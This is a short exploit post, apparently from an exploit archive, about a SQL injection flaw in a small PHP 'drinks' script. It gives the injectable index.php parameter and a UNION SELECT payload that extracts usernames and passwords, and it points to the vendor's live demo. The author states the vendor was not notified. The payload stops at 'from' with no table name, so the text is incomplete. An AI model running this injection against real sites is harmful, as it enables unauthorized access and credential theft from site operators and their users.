HarlandScripts drinks Remote SQL Injection Vulnerability. Vendor: fivedollarscripts.com. Exploit through index.php?cmd=6&recid=null. Contact x.s7acy at gmail dot com
Drinks script.
Vendor: http://www.fivedollarscripts.com
Demo: http://www.fivedollarscripts.com/drinks/index.php
Notified: No. Probably don't care.
Price: Five bones.
/path/index.php?cmd=6&recid=null union all select
1,null,concat(username,char(58),password),4,5,6,7,8,9,10,11,12 from
Live Demo:
union all select
1,null,concat(username,char(58),password),4,5,6,7,8,9,10,11,12 from
contact: x.s7acy at gmail dot com
greetings to bobthejanitor, mason, that new president guy, and the rest.
first script blah blah blah
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